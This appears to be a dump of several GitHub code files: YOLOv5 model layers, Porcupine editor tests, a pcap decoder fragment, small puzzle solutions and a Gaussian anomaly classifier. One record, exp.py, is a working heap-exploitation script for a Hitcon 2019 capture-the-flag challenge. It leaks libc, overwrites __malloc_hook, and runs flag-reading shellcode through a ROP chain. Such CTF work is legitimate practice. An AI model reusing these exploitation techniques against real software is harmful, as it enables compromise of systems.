x(1,64,80,80) to x(1,16,160,160)\n def __init__(self, gain=2):\n super().__init__()\n self.gain = gain\n\n def forward(self, x):\n b, c, h, w = x.size() # assert c % s ** 2 == 0, 'Indivisible gain'\n s = self.gain\n x = x.view(b, s, s, c // s ** 2, h, w) # x(1,2,2,16,80,80)\n x = x.permute(0, 3, 4, 1, 5, 2).contiguous() # x(1,16,80,2,80,2)\n return x.view(b, c // s ** 2, h * s, w * s) # x(1,16,160,160)\n\n\nclass Reshape(nn.Module):\n def __init__(self, c1, c2):\n super().__init__()\n self.avg_pool = nn.AvgPool2d(2, 2)\n self.conv = nn.Conv2d(c1, c2, 1, 1, bias=False)\n\n def forward(self, x):\n return self.conv(self.avg_pool(x))\n\n\nclass Concat(nn.Module):\n # Concatenate a list of tensors along dimension\n def __init__(self, dimension=1):\n super().__init__()\n self.d = dimension\n\n def forward(self, x):\n return torch.cat(x, self.d)\n\n\nclass Concat3(nn.Module):\n def __init__(self, dimension=1):\n super(Concat3, self).__init__()\n self.d = dimension\n # learnable fusion weights: nn.Parameter turns a non-trainable Tensor into a trainable parameter\n # and registers it with the host module, so model.parameters() includes it\n # and it is optimized automatically together with the other parameters\n self.w = nn.Parameter(torch.ones(3, dtype=torch.float32), requires_grad=True)\n self.epsilon = 0.0001\n\n def forward(self, x):\n w = self.w\n weight = w / (torch.sum(w, dim=0) + self.epsilon) # normalize the weights\n # Fast normalized fusion\n x = [weight[0] * x[0], weight[1] * x[1], weight[2] * x[2]]\n return torch.cat(x, self.d)\n\n\nclass Add(nn.Module):\n def __init__(self, c1, c2):\n super().__init__()\n self.conv = nn.Conv2d(c1, c2, 1, 1, bias=False)\n\n def forward(self, x):\n return torch.add(self.conv(x[0]), x[1]) # align channels of the first input with the 1x1 conv before summing (the conv result was previously computed but discarded)\n\n\nclass DetectMultiBackend(nn.Module):\n # YOLOv5 MultiBackend class for python inference on various backends\n def __init__(self, weights='yolov5s.pt', device=None, dnn=True):\n # Usage:\n # PyTorch: weights = *.pt\n # TorchScript: *.torchscript.pt\n # CoreML: *.mlmodel\n # TensorFlow: *_saved_model\n # TensorFlow: *.pb\n # TensorFlow Lite: *.tflite\n # ONNX Runtime: *.onnx\n # OpenCV DNN: *.onnx with dnn=True\n super().__init__()\n w = str(weights[0] if isinstance(weights, list) else weights)\n suffix, suffixes = Path(w).suffix.lower(), ['.pt', '.onnx', '.tflite', '.pb', '', '.mlmodel']\n check_suffix(w, suffixes) # check weights have acceptable suffix\n pt, onnx, tflite, pb, saved_model, coreml = (suffix == x for x in suffixes) # backend booleans\n jit = pt and 'torchscript' in w.lower()\n stride, names = 64, [f'class{i}' for i in range(1000)] # assign defaults\n\n if jit: # TorchScript\n LOGGER.info(f'Loading {w} for TorchScript inference...')\n extra_files = {'config.txt': ''} # model metadata\n model = torch.jit.load(w, _extra_files=extra_files)\n if extra_files['config.txt']:\n d = json.loads(extra_files['config.txt']) # extra_files dict\n stride, names = int(d['stride']), d['names']\n elif pt: # PyTorch\n from models.experimental import attempt_load # scoped to avoid circular import\n model = torch.jit.load(w) if 'torchscript' in w else attempt_load(weights, map_location=device)\n stride = int(model.stride.max()) # model stride\n names = model.module.names if hasattr(model, 'module') else model.names # get class names\n elif coreml: # CoreML *.mlmodel\n import coremltools as ct\n model = ct.models.MLModel(w)\n elif dnn: # ONNX OpenCV DNN\n LOGGER.info(f'Loading {w} for ONNX OpenCV DNN inference...')\n check_requirements(('opencv-python>=4.5.4',))\n net = cv2.dnn.readNetFromONNX(w)\n elif onnx: # ONNX Runtime\n LOGGER.info(f'Loading {w} for ONNX Runtime inference...')\n 
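# NOTE: minimal standalone onnxruntime usage for reference -- a sketch only, assuming a local 'model.onnx' and a 640x640 input; it mirrors how 'session' is queried in forward() below:\n #   sess = onnxruntime.InferenceSession('model.onnx', None)\n #   feed = {sess.get_inputs()[0].name: np.zeros((1, 3, 640, 640), np.float32)}\n #   y = sess.run([sess.get_outputs()[0].name], feed)[0]\n 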
check_requirements(('onnx', 'onnxruntime-gpu' if torch.has_cuda else 'onnxruntime'))\n import onnxruntime\n session = onnxruntime.InferenceSession(w, None)\n else: # TensorFlow model (TFLite, pb, saved_model)\n import tensorflow as tf\n if pb: # https://www.tensorflow.org/guide/migrate#a_graphpb_or_graphpbtxt\n def wrap_frozen_graph(gd, inputs, outputs):\n x = tf.compat.v1.wrap_function(lambda: tf.compat.v1.import_graph_def(gd, name=\"\"), []) # wrapped\n return x.prune(tf.nest.map_structure(x.graph.as_graph_element, inputs),\n tf.nest.map_structure(x.graph.as_graph_element, outputs))\n\n LOGGER.info(f'Loading {w} for TensorFlow *.pb inference...')\n graph_def = tf.Graph().as_graph_def()\n graph_def.ParseFromString(open(w, 'rb').read())\n frozen_func = wrap_frozen_graph(gd=graph_def, inputs=\"x:0\", outputs=\"Identity:0\")\n elif saved_model:\n LOGGER.info(f'Loading {w} for TensorFlow saved_model inference...')\n model = tf.keras.models.load_model(w)\n elif tflite: # https://www.tensorflow.org/lite/guide/python#install_tensorflow_lite_for_python\n if 'edgetpu' in w.lower():\n LOGGER.info(f'Loading {w} for TensorFlow Edge TPU inference...')\n import tflite_runtime.interpreter as tfli\n delegate = {'Linux': 'libedgetpu.so.1', # install https://coral.ai/software/#edgetpu-runtime\n 'Darwin': 'libedgetpu.1.dylib',\n 'Windows': 'edgetpu.dll'}[platform.system()]\n interpreter = tfli.Interpreter(model_path=w, experimental_delegates=[tfli.load_delegate(delegate)])\n else:\n LOGGER.info(f'Loading {w} for TensorFlow Lite inference...')\n interpreter = tf.lite.Interpreter(model_path=w) # load TFLite model\n interpreter.allocate_tensors() # allocate\n input_details = interpreter.get_input_details() # inputs\n output_details = interpreter.get_output_details() # outputs\n self.__dict__.update(locals()) # assign all variables to self\n\n def forward(self, im, augment=False, visualize=False, val=False):\n # YOLOv5 MultiBackend inference\n b, ch, h, w = im.shape # batch, channel, height, width\n if self.pt: # PyTorch\n y = self.model(im) if self.jit else self.model(im, augment=augment, visualize=visualize)\n return y if val else y[0]\n elif self.coreml: # CoreML *.mlmodel\n im = im.permute(0, 2, 3, 1).cpu().numpy() # torch BCHW to numpy BHWC shape(1,320,192,3)\n im = Image.fromarray((im[0] * 255).astype('uint8'))\n # im = im.resize((192, 320), Image.ANTIALIAS)\n y = self.model.predict({'image': im}) # coordinates are xywh normalized\n box = xywh2xyxy(y['coordinates'] * [[w, h, w, h]]) # xyxy pixels\n conf, cls = y['confidence'].max(1), y['confidence'].argmax(1).astype(np.float)\n y = np.concatenate((box, conf.reshape(-1, 1), cls.reshape(-1, 1)), 1)\n elif self.onnx: # ONNX\n im = im.cpu().numpy() # torch to numpy\n if self.dnn: # ONNX OpenCV DNN\n self.net.setInput(im)\n y = self.net.forward()\n else: # ONNX Runtime\n y = self.session.run([self.session.get_outputs()[0].name], {self.session.get_inputs()[0].name: im})[0]\n else: # TensorFlow model (TFLite, pb, saved_model)\n im = im.permute(0, 2, 3, 1).cpu().numpy() # torch BCHW to numpy BHWC shape(1,320,192,3)\n if self.pb:\n y = self.frozen_func(x=self.tf.constant(im)).numpy()\n elif self.saved_model:\n y = self.model(im, training=False).numpy()\n elif self.tflite:\n input, output = self.input_details[0], self.output_details[0]\n int8 = input['dtype'] == np.uint8 # is TFLite quantized uint8 model\n if int8:\n scale, zero_point = input['quantization']\n im = (im / scale + zero_point).astype(np.uint8) # de-scale\n self.interpreter.set_tensor(input['index'], 
im)\n self.interpreter.invoke()\n y = self.interpreter.get_tensor(output['index'])\n if int8:\n scale, zero_point = output['quantization']\n y = (y.astype(np.float32) - zero_point) * scale # re-scale\n y[..., 0] *= w # x\n y[..., 1] *= h # y\n y[..., 2] *= w # w\n y[..., 3] *= h # h\n y = torch.tensor(y)\n return (y, []) if val else y\n\n\nclass DecoupledHead(nn.Module):\n def __init__(self, ch=256, nc=80, anchors=()):\n super().__init__()\n self.nc = nc # number of classes\n self.nl = len(anchors) # number of detection layers\n self.na = len(anchors[0]) // 2 # number of anchors\n self.merge = Conv(ch, 256 , 1, 1)\n self.cls_convs1 = Conv(256 , 256 , 3, 1, 1)\n self.cls_convs2 = Conv(256 , 256 , 3, 1, 1)\n self.reg_convs1 = Conv(256 , 256 , 3, 1, 1)\n self.reg_convs2 = Conv(256 , 256 , 3, 1, 1)\n self.cls_preds = nn.Conv2d(256 , self.nc * self.na, 1)\n self.reg_preds = nn.Conv2d(256 , 4 * self.na, 1)\n self.obj_preds = nn.Conv2d(256 , 1 * self.na, 1)\n\n def forward(self, x):\n x = self.merge(x)\n x1 = self.cls_convs1(x)\n x1 = self.cls_convs2(x1)\n x1 = self.cls_preds(x1)\n x2 = self.reg_convs1(x)\n x2 = self.reg_convs2(x2)\n x21 = self.reg_preds(x2)\n x22 = self.obj_preds(x2)\n out = torch.cat([x21, x22, x1], 1)\n return out\n\n\nclass AutoShape(nn.Module):\n # YOLOv5 input-robust model wrapper for passing cv2/np/PIL/torch inputs. Includes preprocessing, inference and NMS\n conf = 0.25 # NMS confidence threshold\n iou = 0.45 # NMS IoU threshold\n classes = None # (optional list) filter by class, i.e. = [0, 15, 16] for COCO persons, cats and dogs\n multi_label = False # NMS multiple labels per box\n max_det = 1000 # maximum number of detections per image\n\n def __init__(self, model):\n super().__init__()\n self.model = model.eval()\n\n def autoshape(self):\n LOGGER.info('AutoShape already enabled, skipping... ') # model already converted to model.autoshape()\n return self\n\n def _apply(self, fn):\n # Apply to(), cpu(), cuda(), half() to model tensors that are not parameters or registered buffers\n self = super()._apply(fn)\n m = self.model.model[-1] # Detect()\n m.stride = fn(m.stride)\n m.grid = list(map(fn, m.grid))\n if isinstance(m.anchor_grid, list):\n m.anchor_grid = list(map(fn, m.anchor_grid))\n return self\n\n @torch.no_grad()\n def forward(self, imgs, size=640, augment=False, profile=False):\n # Inference from various sources. For height=640, width=1280, RGB images example inputs are:\n # file: imgs = 'data/images/zidane.jpg' # str or PosixPath\n # URI: = 'https://ultralytics.com/images/zidane.jpg'\n # OpenCV: = cv2.imread('image.jpg')[:,:,::-1] # HWC BGR to RGB x(640,1280,3)\n # PIL: = Image.open('image.jpg') or ImageGrab.grab() # HWC x(640,1280,3)\n # numpy: = np.zeros((640,1280,3)) # HWC\n # torch: = torch.zeros(16,3,320,640) # BCHW (scaled to size=640, 0-1 values)\n # multiple: = [Image.open('image1.jpg'), Image.open('image2.jpg'), ...] 
# list of images\n\n t = [time_sync()]\n p = next(self.model.parameters()) # for device and type\n if isinstance(imgs, torch.Tensor): # torch\n with amp.autocast(enabled=p.device.type != 'cpu'):\n return self.model(imgs.to(p.device).type_as(p), augment, profile) # inference\n\n # Pre-process\n n, imgs = (len(imgs), imgs) if isinstance(imgs, list) else (1, [imgs]) # number of images, list of images\n shape0, shape1, files = [], [], [] # image and inference shapes, filenames\n for i, im in enumerate(imgs):\n f = f'image{i}' # filename\n if isinstance(im, (str, Path)): # filename or uri\n im, f = Image.open(requests.get(im, stream=True).raw if str(im).startswith('http') else im), im\n im = np.asarray(exif_transpose(im))\n elif isinstance(im, Image.Image): # PIL Image\n im, f = np.asarray(exif_transpose(im)), getattr(im, 'filename', f) or f\n files.append(Path(f).with_suffix('.jpg').name)\n if im.shape[0] < 5: # image in CHW\n im = im.transpose((1, 2, 0)) # reverse dataloader .transpose(2, 0, 1)\n im = im[..., :3] if im.ndim == 3 else np.tile(im[..., None], 3) # enforce 3ch input\n s = im.shape[:2] # HWC\n shape0.append(s) # image shape\n g = (size / max(s)) # gain\n shape1.append([y * g for y in s])\n imgs[i] = im if im.data.contiguous else np.ascontiguousarray(im) # update\n shape1 = [make_divisible(x, int(self.stride.max())) for x in np.stack(shape1, 0).max(0)] # inference shape\n x = [letterbox(im, new_shape=shape1, auto=False)[0] for im in imgs] # pad\n x = np.stack(x, 0) if n > 1 else x[0][None] # stack\n x = np.ascontiguousarray(x.transpose((0, 3, 1, 2))) # BHWC to BCHW\n x = torch.from_numpy(x).to(p.device).type_as(p) / 255 # uint8 to fp16/32\n t.append(time_sync())\n\n with amp.autocast(enabled=p.device.type != 'cpu'):\n # Inference\n y = self.model(x, augment, profile)[0] # forward\n t.append(time_sync())\n\n # Post-process\n y = non_max_suppression(y, self.conf, iou_thres=self.iou, classes=self.classes,\n multi_label=self.multi_label, max_det=self.max_det) # NMS\n for i in range(n):\n scale_coords(shape1, y[i][:, :4], shape0[i])\n\n t.append(time_sync())\n return Detections(imgs, y, files, t, self.names, x.shape)\n\n\nclass Detections:\n # YOLOv5 detections class for inference results\n def __init__(self, imgs, pred, files, times=None, names=None, shape=None):\n super().__init__()\n d = pred[0].device # device\n gn = [torch.tensor([*(im.shape[i] for i in [1, 0, 1, 0]), 1, 1], device=d) for im in imgs] # normalizations\n self.imgs = imgs # list of images as numpy arrays\n self.pred = pred # list of tensors pred[0] = (xyxy, conf, cls)\n self.names = names # class names\n self.files = files # image filenames\n self.xyxy = pred # xyxy pixels\n self.xywh = [xyxy2xywh(x) for x in pred] # xywh pixels\n self.xyxyn = [x / g for x, g in zip(self.xyxy, gn)] # xyxy normalized\n self.xywhn = [x / g for x, g in zip(self.xywh, gn)] # xywh normalized\n self.n = len(self.pred) # number of images (batch size)\n self.t = tuple((times[i + 1] - times[i]) * 1000 / self.n for i in range(3)) # timestamps (ms)\n self.s = shape # inference BCHW shape\n\n def display(self, pprint=False, show=False, save=False, crop=False, render=False, save_dir=Path('')):\n crops = []\n for i, (im, pred) in enumerate(zip(self.imgs, self.pred)):\n s = f'image {i + 1}/{len(self.pred)}: {im.shape[0]}x{im.shape[1]} ' # string\n if pred.shape[0]:\n for c in pred[:, -1].unique():\n n = (pred[:, -1] == c).sum() # detections per class\n s += f\"{n} {self.names[int(c)]}{'s' * (n > 1)}, \" # add to string\n if show or save or render or 
crop:\n annotator = Annotator(im, example=str(self.names))\n for *box, conf, cls in reversed(pred): # xyxy, confidence, class\n label = f'{self.names[int(cls)]} {conf:.2f}'\n if crop:\n file = save_dir / 'crops' / self.names[int(cls)] / self.files[i] if save else None\n crops.append({'box': box, 'conf': conf, 'cls': cls, 'label': label,\n 'im': save_one_box(box, im, file=file, save=save)})\n else: # all others\n annotator.box_label(box, label, color=colors(cls))\n im = annotator.im\n else:\n s += '(no detections)'\n\n im = Image.fromarray(im.astype(np.uint8)) if isinstance(im, np.ndarray) else im # from np\n if pprint:\n LOGGER.info(s.rstrip(', '))\n if show:\n im.show(self.files[i]) # show\n if save:\n f = self.files[i]\n im.save(save_dir / f) # save\n if i == self.n - 1:\n LOGGER.info(f\"Saved {self.n} image{'s' * (self.n > 1)} to {colorstr('bold', save_dir)}\")\n if render:\n self.imgs[i] = np.asarray(im)\n if crop:\n if save:\n LOGGER.info(f'Saved results to {save_dir}\\n')\n return crops\n\n def print(self):\n self.display(pprint=True) # print results\n LOGGER.info(f'Speed: %.1fms pre-process, %.1fms inference, %.1fms NMS per image at shape {tuple(self.s)}' %\n self.t)\n\n def show(self):\n self.display(show=True) # show results\n\n def save(self, save_dir='runs/detect/exp'):\n save_dir = increment_path(save_dir, exist_ok=save_dir != 'runs/detect/exp', mkdir=True) # increment save_dir\n self.display(save=True, save_dir=save_dir) # save results\n\n def crop(self, save=True, save_dir='runs/detect/exp'):\n save_dir = increment_path(save_dir, exist_ok=save_dir != 'runs/detect/exp', mkdir=True) if save else None\n return self.display(crop=True, save=save, save_dir=save_dir) # crop results\n\n def render(self):\n self.display(render=True) # render results\n return self.imgs\n\n def pandas(self):\n # return detections as pandas DataFrames, i.e. print(results.pandas().xyxy[0])\n new = copy(self) # return copy\n ca = 'xmin', 'ymin', 'xmax', 'ymax', 'confidence', 'class', 'name' # xyxy columns\n cb = 'xcenter', 'ycenter', 'width', 'height', 'confidence', 'class', 'name' # xywh columns\n for k, c in zip(['xyxy', 'xyxyn', 'xywh', 'xywhn'], [ca, ca, cb, cb]):\n a = [[x[:5] + [int(x[5]), self.names[int(x[5])]] for x in x.tolist()] for x in getattr(self, k)] # update\n setattr(new, k, [pd.DataFrame(x, columns=c) for x in a])\n return new\n\n def tolist(self):\n # return a list of Detections objects, i.e. 'for result in results.tolist():'\n x = [Detections([self.imgs[i]], [self.pred[i]], self.names, self.s) for i in range(self.n)]\n for d in x:\n for k in ['imgs', 'pred', 'xyxy', 'xyxyn', 'xywh', 'xywhn']:\n setattr(d, k, getattr(d, k)[0]) # pop out of list\n return x\n\n def __len__(self):\n return self.n\n\n\nclass Classify(nn.Module):\n # Classification head, i.e. 
x(b,c1,20,20) to x(b,c2)\n def __init__(self, c1, c2, k=1, s=1, p=None, g=1): # ch_in, ch_out, kernel, stride, padding, groups\n super().__init__()\n self.aap = nn.AdaptiveAvgPool2d(1) # to x(b,c1,1,1)\n self.conv = nn.Conv2d(c1, c2, k, s, autopad(k, p), groups=g) # to x(b,c2,1,1)\n self.flat = nn.Flatten()\n\n def forward(self, x):\n z = torch.cat([self.aap(y) for y in (x if isinstance(x, list) else [x])], 1) # cat if list\n return self.flat(self.conv(z)) # flatten to x(b,c2)\n","repo_name":"shihanghoney97/YOLO-SK","sub_path":"code/models/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":83446,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"71417116249","text":"import os\nimport sys\n\nimport pytest\n\nfrom porcupine import actions, get_main_window, menubar, tabs\n\n\ndef test_virtual_events_calling_menu_callbacks():\n called = []\n menubar.get_menu(\"Foo\").add_command(label=\"Bar\", command=(lambda: called.append(\"bar\")))\n menubar.get_menu(\"Foo\").add_command(\n label=\"Baz\", command=(lambda: called.append(\"baz\")), state=\"disabled\"\n )\n menubar.update_keyboard_shortcuts()\n get_main_window().update()\n get_main_window().event_generate(\"<<Menubar:Foo/Bar>>\")\n get_main_window().event_generate(\"<<Menubar:Foo/Baz>>\")\n assert called == [\"bar\"]\n\n\ndef test_set_enabled_based_on_tab(tabmanager):\n tab1 = tabs.Tab(tabmanager)\n tab2 = tabs.Tab(tabmanager)\n\n menubar.get_menu(\"Foo\").add_command(label=\"Spam\")\n menubar.set_enabled_based_on_tab(\"Foo/Spam\", (lambda tab: tab is tab2))\n assert menubar.get_menu(\"Foo\").entrycget(\"end\", \"state\") == \"disabled\"\n\n tabmanager.add_tab(tab1)\n assert menubar.get_menu(\"Foo\").entrycget(\"end\", \"state\") == \"disabled\"\n\n tabmanager.add_tab(tab2)\n assert menubar.get_menu(\"Foo\").entrycget(\"end\", \"state\") == \"normal\"\n\n tabmanager.select(tab1)\n tabmanager.update()\n assert menubar.get_menu(\"Foo\").entrycget(\"end\", \"state\") == \"disabled\"\n\n tabmanager.close_tab(tab1)\n tabmanager.close_tab(tab2)\n assert menubar.get_menu(\"Foo\").entrycget(\"end\", \"state\") == \"disabled\"\n\n\ndef test_item_doesnt_exist():\n with pytest.raises(LookupError, match=r\"^menu item 'Asdf/BlaBlaBla' not found$\"):\n menubar.set_enabled_based_on_tab(\"Asdf/BlaBlaBla\", (lambda tab: True))\n\n\ndef test_text_widget_binding_weirdness(filetab):\n # write text to text widget and select some of it\n filetab.textwidget.insert(\"1.0\", \"hello world\")\n filetab.textwidget.tag_add(\"sel\", \"1.4\", \"1.7\")\n\n called = 0\n\n def fake_can_be_closed():\n nonlocal called\n called += 1\n return False\n\n filetab.can_be_closed = fake_can_be_closed\n\n # pressing ctrl+w should leave the text as is (default bindings don't run)\n # and try to close the tab (except that we prevented it from closing)\n filetab.update()\n filetab.textwidget.event_generate(\"<<Menubar:File/Close>>\")\n assert filetab.textwidget.get(\"1.0\", \"end - 1 char\") == \"hello world\"\n assert called == 1\n\n\n@pytest.mark.skipif(sys.platform != \"win32\", reason=\"checks if Windows-specific bug was fixed\")\n@pytest.mark.xfail(\n os.environ.get(\"GITHUB_ACTIONS\") != \"true\",\n reason=\"fails on some computers even though pressing Alt+F4 works\",\n)\ndef test_alt_f4_bug_with_filetab(filetab, mocker):\n mock_quit = mocker.patch(\"porcupine.menubar.quit\")\n filetab.textwidget.event_generate(\"<Alt-F4>\")\n mock_quit.assert_called_once_with()\n\n\n@pytest.mark.skipif(sys.platform != \"win32\", reason=\"checks if Windows-specific bug was 
fixed\")\n@pytest.mark.xfail(\n os.environ.get(\"GITHUB_ACTIONS\") != \"true\",\n reason=\"fails on some computers even though pressing Alt+F4 works\",\n)\ndef test_alt_f4_bug_without_filetab(mocker):\n mock_quit = mocker.patch(\"porcupine.menubar.quit\")\n get_main_window().event_generate(\"\")\n mock_quit.assert_called_once_with()\n\n\ndef test_add_filetab_action(filetab, tmp_path):\n def _callback(tab):\n filetab.save_as(tmp_path / \"asdf.md\")\n tab.update()\n\n # TODO: https://github.com/Akuli/porcupine/issues/1364\n assert filetab.settings.get(\"filetype_name\", object) == \"Python\"\n\n # create action\n action = actions.register_filetab_action(\n name=\"python\",\n description=\"test python action\",\n callback=_callback,\n availability_callback=actions.filetype_is(\"Python\"),\n )\n\n path = \"testy_test/python\"\n\n # check that no item exists at path\n menu_item = menubar._find_item(\n menubar.get_menu(menubar._split_parent(path)[0]), menubar._split_parent(path)[1]\n )\n assert menu_item is None\n\n # register action to path\n menubar.add_filetab_action(path=path, action=action)\n\n # check path item exists\n menu = menubar.get_menu(menubar._split_parent(path)[0])\n menu_item = menubar._find_item(menu, menubar._split_parent(path)[1])\n assert menu_item is not None\n\n # check path item available\n assert menu.entrycget(index=menu_item, option=\"state\") == \"normal\"\n\n # activate item\n action.callback(filetab)\n\n # verify something happened\n assert filetab.settings.get(\"filetype_name\", object) == \"Markdown\"\n\n # check unavailable (because Markdown != Python)\n assert menu.entrycget(index=menu_item, option=\"state\") == \"disabled\"\n","repo_name":"Akuli/porcupine","sub_path":"tests/test_menubar.py","file_name":"test_menubar.py","file_ext":"py","file_size_in_byte":4564,"program_lang":"python","lang":"en","doc_type":"code","stars":123,"dataset":"github-code","pt":"31"} +{"seq_id":"14803791592","text":"import struct\n\ndef decode_pcap_file(pcap_file):\n with open(pcap_file, \"rb\") as file:\n # Read and skip the pcap file header (24 bytes)\n file.read(24)\n\n packet_number = 1 # Initialize packet number\n\n while True:\n # Read the pcap packet header (16 bytes)\n header = file.read(16)\n if not header:\n break\n\n # Extract packet timestamp and length\n ts_sec, ts_usec, incl_len, orig_len = struct.unpack(\"=2:\n while True:\n same_doll= False\n for n in range(0,len(basket)-1):\n if basket[n]==basket[n+1]:\n del basket[n]\n del basket[n]\n answer+=2\n same_doll=True\n break\n if not same_doll:\n break\n return answer\n","repo_name":"Hongsoojeong/AlgorithmStudy","sub_path":"2019 카카오 개발자 겨울 인턴십/1. 크레인 인형뽑기 게임.py","file_name":"1. 
크레인 인형뽑기 게임.py","file_ext":"py","file_size_in_byte":647,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"9631741954","text":"from pwn import *\ncontext.log_level='debug'\ncontext.terminal = ['tmux', 'splitw', '-h']\ncontext.arch='amd64'\ndef cmd(c):\n p.sendlineafter(\"> \",str(c))\ndef add(idx,size,c=\"A\"):\n cmd(1)\n p.sendlineafter(\": \",str(idx))\n p.sendafter(\": \",c.ljust(size,'\\0'))\ndef edit(idx,c):\n cmd(2) \n p.sendlineafter(\": \",str(idx))\n p.sendafter(\": \",c)\ndef show(idx):\n cmd(3)\n p.sendlineafter(\": \",str(idx))\ndef free(idx):\n cmd(4)\n p.sendlineafter(\": \",str(idx))\n\nlibc=ELF(\"/lib/x86_64-linux-gnu/libc.so.6\")\np=process(\"./pwn\")\n#p=remote(\"buuoj.cn\",25327)\nfor x in range(6):\n add(0,0x88)\n free(0)\nfor x in range(7):\n add(0,0x288,\"n132\")\n free(0)\nadd(0,0x288)\nadd(1,0x99)\nfree(0)\nshow(0)\np.readuntil(\"name: \")\nbase=u64(p.read(6)+'\\0\\0')-libc.sym['__malloc_hook']-0x70\nlibc.address=base\n\nadd(0,0x1f8)\nfree(0)\nfree(1)\nadd(0,0x288)\nadd(1,0x99)\nfree(0)\nadd(2,0x1f8)\nfree(2)\nshow(2)\np.readuntil(\"name: \")\nheap=u64(p.read(6)+'\\0\\0')-0x17b0\nadd(2,0x217)\nfree(2)\nedit(2,p64(libc.sym['__malloc_hook']))\nedit(0,'\\0'*0x1f8+p64(0x91)+p64(heap+0x19a0)+p64(heap+0x30-0x10))\nlog.warning(hex(heap))\nlog.warning(hex(base))\nadd(1,0x88)\ncmd(0xc388)\nsh=shellcraft.open(\"./flag\")\nsh+='''\nmov rdi,rax\nmov rsi,{}\nmov rdx,0x30\nxor rax,rax\nsyscall\nmov rdi,1\nmov rax,1\nsyscall\n'''.format(heap+0x800)\np.send(asm(sh))\ncmd(0xc388)\ngadget=0x000000000010e994+base#add rsp,0x58;ret;\nrdi=0x0000000000026542+base\ngdb.attach(p)\np.send(p64(gadget))\nret=0x000000000002535f+base\nrdi=0x0000000000026542+base\nrsi=0x0000000000026f9e+base\nrdx=0x000000000012bda6+base\nrax=0x0000000000047cf8+base\nsys=0x0000000000026bd4+base\nrcx=0x000000000010b31e+base\nrop=p64(ret)*3+p64(rdi)+p64(0xa)+p64(rsi)+p64(heap)+p64(rdx)+p64(0x3000)+p64(rcx)+p64(7)+p64(libc.sym['syscall'])+p64(heap+0x1e30)\nadd(0,0x200,rop)\np.interactive()\n","repo_name":"n132/Watermalon","sub_path":"Hitcon_2019/one_punch_man/exp.py","file_name":"exp.py","file_ext":"py","file_size_in_byte":1796,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"31"} +{"seq_id":"33606571565","text":"#!/bin/python3\n\nimport math\nimport os\nimport random\nimport re\nimport sys\n\n# Complete the jumpingOnClouds function below.\ndef jumpingOnClouds(n,c):\n jumps = 0\n i = 2\n while i <= n-1:\n jumps+=1\n i = i+2 if c[i] == 0 else i+1\n if i == n:\n jumps+=1\n return jumps\n\n\nif __name__ == '__main__':\n fptr = open('jumpingonclouds.txt', 'w')\n\n n = int('7')\n\n c = list(map(int, '0 0 0 0 0 0 0'.rstrip().split()))\n\n result = jumpingOnClouds(n,c)\n\n fptr.write(str(result) + '\\n')\n\n fptr.close()\n","repo_name":"poornapragnarao/hackerrank","sub_path":"jumpingclouds.py","file_name":"jumpingclouds.py","file_ext":"py","file_size_in_byte":533,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"36586082646","text":"#!/usr/bin/env python\n# encoding: utf-8\n\n## @package multivariategaussian\n#\n# Multivariate gaussian AIS (Artificial Immune System) classifier.\n\nfrom oacs.classifier.univariategaussian import UnivariateGaussian\nimport numpy as np\nimport pandas as pd\nfrom numpy import pi, exp\n\n## MultivariateGaussian\n#\n# Multivariate gaussian AIS (Artificial Immune System) classifier class, this will return a set of parameters: a vector 
of means Mu, and a covariance matrix Sigma2\n# This AIS classifier can capture correlations between any pair of features\nclass MultivariateGaussian(UnivariateGaussian):\n\n ## @var config\n # An instance of the ConfigParser object, already loaded\n\n ## Constructor\n # @param config An instance of the ConfigParser class\n def __init__(self, config=None, *args, **kwargs):\n return UnivariateGaussian.__init__(self, config, *args, **kwargs)\n\n ## Learn the parameters from a given set X of examples, and labels Y\n # @param X Samples set\n # @param Y Labels set (corresponding to X)\n def learn(self, X=None, Y=None, *args, **kwargs):\n Yt = Y[Y==0].dropna() # get the list of non-anomalous examples\n Xt = X.iloc[Yt.index] # filter out anomalous examples and keep only non-anomalous ones\n Mu = self.mean(Xt, Xt['framerepeat']) # Mean\n Sigma2 = MultivariateGaussian.covar(Xt, Mu, 'framerepeat') # Vector of variances or Covariance matrix\n return {'Mu': Mu, 'Sigma2': Sigma2} # always return a dict of variables if you want your variables saved durably and accessible later\n\n ## Multivariate gaussian prediction of the probability/class of an example given a set of parameters (weighted mean and covariance matrix)\n # @param X One unknown example to label\n # @param Mu Weighted mean of X\n # @param Sigma2 Covariance matrix of X\n # TODO: compatibility with more than one sample (detect type==pd.Series)?\n def predict(self, X=None, Mu=None, Sigma2=None, *args, **kwargs):\n return MultivariateGaussian._predict(X=X, Mu=Mu, Sigma2=Sigma2)\n\n ## Multivariate gaussian prediction of the probability/class of an example given a set of parameters (weighted mean and covariance matrix)\n # Note: we use a proxy method predict so that we can put this one as a staticmethod, and thus be called by other classes (since the code here is very generic)\n # @param X One unknown example to label\n # @param Mu Weighted mean of X\n # @param Sigma2 Covariance matrix of X\n # TODO: compatibility with more than one sample (detect type==pd.Series)?\n @staticmethod\n def _predict(X=None, Mu=None, Sigma2=None, *args, **kwargs):\n if 'framerepeat' in X.keys():\n if type(X) == pd.Series:\n X = X.drop(['framerepeat']) # axis will produce a bug with Series\n else:\n X = X.drop(['framerepeat'], axis=1)\n if 'framerepeat' in Sigma2.keys():\n Sigma2 = Sigma2.drop(['framerepeat'], axis=0) # drop on both axes\n Sigma2 = Sigma2.drop(['framerepeat'], axis=1)\n if 'framerepeat' in Mu.keys():\n Mu = Mu.drop(['framerepeat'])\n\n # if sigma2 is a vector, we convert it to a (covariance) matrix (filled with only values on the diagonal)\n if type(Sigma2) == pd.Series:\n Sigma2 = np.diag(Sigma2)\n Sigma2 = pd.DataFrame(Sigma2)\n\n n = len(Mu.keys()) #X.shape[0]\n xm = X-Mu # X difference to the mean\n xm = xm.fillna(0) # if we have one NA, the whole result of all values will be NA\n if type(X) == pd.Series:\n Pred = (2*pi)**(-n/2) * np.linalg.det(Sigma2)**-0.5 * exp(-0.5 * xm.T.dot(np.linalg.pinv(Sigma2)).dot(xm)) # density = (2*pi)^(-n/2) * |Sigma|^(-1/2) * exp(-0.5 * xm' * inv(Sigma) * xm)\n else:\n #T = np.outer(xm.dot(np.linalg.pinv(Sigma2)), xm.T) #debug - produce Memory Error even with relatively small sets!\n #print 